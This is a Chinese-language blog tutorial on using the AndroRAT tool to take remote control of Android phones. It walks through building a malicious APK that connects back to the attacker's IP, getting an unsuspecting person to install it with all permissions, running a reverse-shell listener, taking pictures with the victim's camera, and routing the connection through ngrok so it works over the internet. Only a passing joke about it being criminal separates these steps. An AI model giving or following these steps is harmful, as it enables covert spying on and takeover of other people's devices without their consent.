如何远程控制任意安卓设备2.0(androRAT)
作者:FancyPig | 发布时间: | 更新时间:
相关阅读
之前分享过很多期有关远程控制的相关教程,今天我们再补充一期,本质上原理还是Reverse Shell(反弹shell)
data-postsbox="{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21849,"comment_count":1000,"category":"sg","is_forum_post":false}">{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21849,"comment_count":1000,"category":"sg","is_forum_post":false}
data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5792,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5792,"comment_count":7,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":1217,"title":"Andriod手机远程控制程序开源项目及详细教程","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9830,"comment_count":82,"category":"vip","is_forum_post":false}">{"id":1217,"title":"Andriod手机远程控制程序开源项目及详细教程","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9830,"comment_count":82,"category":"vip","is_forum_post":false}
视频教程
相关命令
首先下载androRAT github项目
git clone https://github.com/karma9874/AndroRAT.git然后进入AndroRAT目录
cd AndroRAT安装Python依赖
pip install -r requirements.txt生成名为fancypig.apk的恶意apk文件
后面要跟上你的kali linux的IP地址192.168.x.x以及对应的端口号,视频中是4444,我们这里默认是8000
python androRAT.py --build -i 192.169.x.x -p 8000 -o fancypig.apk
然后,你需要进行投递,让热心网友打开,需要默认授权全部权限
同时,你还要开启监听端口
python androRAT.py --shell -i 0.0.0.0 -p 8000如果热心网友成功打开了,你可以输入help来获取相关远程控制的命令,例如,我们可以使用摄像头
camlist然后选择后置摄像头(0)或者前置摄像头(1),视频中选用的是后置摄像头
takepic 0然后你就可以进入AndroRAT/Dumps路径下,找到摄像头拍的照片了
这看起来就很刑啊……
这里不建议大家部署到公网上,当然你非要向亲密的朋友炫技的话,我们这里也给大家了一个思路,其实就是通过ngrok代理服务,让你的网页快速上线,同时建立连接,这个其实我们在之前的视频里也用到过
data-postsbox="{"id":8916,"title":"黑客是如何通过社交平台钓鱼链接获取用户密码的","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":8753,"comment_count":11,"category":"sg","is_forum_post":false}">{"id":8916,"title":"黑客是如何通过社交平台钓鱼链接获取用户密码的","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":8753,"comment_count":11,"category":"sg","is_forum_post":false}
我们可以先运行下面的命令,获取ngrok的tcp节点
./ngrok
然后打包的时候,用-i指向你的[ngrok节点],视频中是2.tcp.ngrok.io,你需要填写自己对应的,同时要填写端口信息
python androRAT.py --build -i [ngrok节点] -p [端口] -o fancypig.apk打包好fancypig.apk文件后发送给热心网友,监听反弹shell的手段和上面完全一致,视频中是4444端口,我们这里用默认的8000,这个你可以自定义,只要前后一致就行了
python androRAT.py --shell -i 0.0.0.0 -p 8000然后就大功告成了!